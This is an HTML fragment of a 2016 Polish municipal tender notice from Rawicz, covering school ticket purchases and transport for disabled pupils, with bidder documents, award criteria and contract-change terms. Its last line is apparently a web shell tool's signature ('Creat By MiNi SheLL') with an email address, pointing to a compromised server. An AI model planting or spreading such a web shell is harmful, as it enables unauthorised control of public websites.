<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.  Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia / nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniona i podpisana przez Wykonawcę oferta przetargowa (w oryginale) (załącznik nr 1 do SIWZ).
2)	Zobowiązanie innych podmiotów (w oryginale) oraz inne dokumenty (jeżeli Wykonawca korzysta z tych uprawnień) podpisane przez osoby uprawnione do reprezentacji podmiotu (zgodnie z KRS, CEIDG) lub podpisane przez osoby na podstawie udzielonego i załączonego do zobowiązania pełnomocnictwa.
3)	Oryginał pełnomocnictwa do reprezentowania lub kopia pełnomocnictwa poświadczona przez notariusza. (Pełnomocnictwo należy złożyć w przypadku gdy Wykonawcę w przetargu reprezentuje pełnomocnik jak również w przypadku Wykonawców wspólnie ubiegających się o zamówienie, którzy zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1)	wystąpienia w trakcie realizacji zamówienia nieprzewidzianych okoliczności  powodujących, że wykonanie zamówienia będzie niemożliwe do wykonania zgodnie z ustalonymi trasami i godzinami bez wprowadzenia zmian w wykazie  (np. zmiana godzin dowozu i odwozu, wprowadzenie zmiany organizacji ruchu na trasie przejazdu itd), 
2)	potrzeby wykonania usług zamiennych lub odstąpienia od realizacji części usług, i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego lub Wykonawcy,
3)	wystąpienia usług dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
4)	zmiany w wykazie tras, nazw miejscowości-przystanków, godzin dowozu i odwozu - rozpoczęcia 
i zakończenia zajęć, zmiany ilości dzieci, zmiany ilości kilometrów,   
5)	zmiany wysokości stawki podatku VAT, 
6)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,
7)	zmiana dotycząca zatrudnienia podwykonawców w przypadku gdy Wykonawca oświadczył, iż wykona umowę osobiście, w zakresie zgodnym ze SIWZ, zawartą umową  oraz zapisami wynikającymi z ustawy,   
8)	zmiana albo  rezygnacja  z podwykonawcy (podmiotu zobowiązanego) na którego  zasoby  wykonawca  powoływał się na zasadach określonych  w art. 26 ust. 2b, w celu wykazania spełnienia warunków  udziału  w postępowaniu , o których  mowa w art. 22 ust. 1,  na wniosek Wykonawcy uzasadniający taką zmianę, po wykazaniu przez Wykonawcę  iż proponowany  inny podwykonawca  lub wykonawca samodzielnie spełnia je w stopniu  nie mniejszym niż wymagany w trakcie  postępowania o udzielenie zamówienia.      
9)	zmiana podwykonawców oraz zakresu podwykonawstwa w przypadku gdy Wykonawca wykonuje umowę przy pomocy podwykonawców, po spełnieniu przesłanek wynikających z SIWZ, umowy oraz ustawy,   
10)	zmiana terminu realizacji zamówienia, 
11)	przekształcenie którejkolwiek ze stron umowy,
12)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
13)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego,
14)	innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ jest udostępniana zainteresowanym wykonawcom w siedzibie Zamawiającego - pok. 2 Urzędu Miejskiego Gminy Rawicz ul. Piłsudskiego 21, 63-900 Rawicz, zgodnie z zapisami określonymi w SIWZ.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2016 godzina 10:00, miejsce: w siedzibie Zamawiającego - sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz, ul. Piłsudskiego 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowe ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia, wezwania oraz inne informacje i dokumenty w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie. 3. ZAMAWIAJĄCY dopuszcza również możliwość porozumiewania się OBU STRON (Wykonawca, Zamawiający) za pomocą: faksu 65 546-41-67 oraz poczty elektronicznej przetargi@rawicz.pl , 4. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem lub pocztą elektroniczną dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 7. Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia o których mowa w art. 29 ust. 4.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - zakup biletów miesięcznych  dla uczniów dojeżdżających do Szkoły  Podstawowej nr 4 w Rawiczu,  Gimnazjum nr 1 w Rawiczu,  Szkoły Podstawowej w Zielonej Wsi, Szkoły  Podstawowej w Słupi Kapitulnej  oraz  Zespołu Szkół Specjalnych w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup biletów miesięcznych  dla uczniów dojeżdżających do Szkoły  Podstawowej nr 4 w Rawiczu,  Gimnazjum nr 1 w Rawiczu,  Szkoły Podstawowej w Zielonej Wsi, Szkoły  Podstawowej w Słupi Kapitulnej  oraz  Zespołu Szkół Specjalnych w Rawiczu.  Ilość biletów miesięcznie 339.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet  II   - zakup biletów miesięcznych dla uczniów dojeżdżających do  Szkoły Podstawowej  nr 5 w Rawiczu, Gimnazjum nr 1 w Rawiczu, Gimnazjum w Sierakowie oraz Zespołu Szkół           
Specjalnych w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup biletów miesięcznych dla uczniów dojeżdżających do  Szkoły Podstawowej  nr 5 w Rawiczu, Gimnazjum nr 1 w Rawiczu, Gimnazjum w Sierakowie oraz Zespołu Szkół           
Specjalnych w Rawiczu. Ilość biletów miesięcznie 443.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III  - dowóz uczniów niepełnosprawnych do Zespołu Szkół Specjalnych w Rawiczu  oraz do Przedszkola Nr 5 Oddziały Specjalne w Rawiczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest codzienny dowóz uczniów niepełnosprawnych  z terenu gminy Rawicz do placówek oświatowych i odwiezienie  ich po zajęciach  do miejsca zamieszkania wraz zapewnieniem im opieki podczas dowozu i odwozu, na podstawie  ustalonego  harmonogramu dowozu  i odwozu. Ilość dzieci 7. Dzienna długość trasy  - 54 kilometrów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.10.00.00-9, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com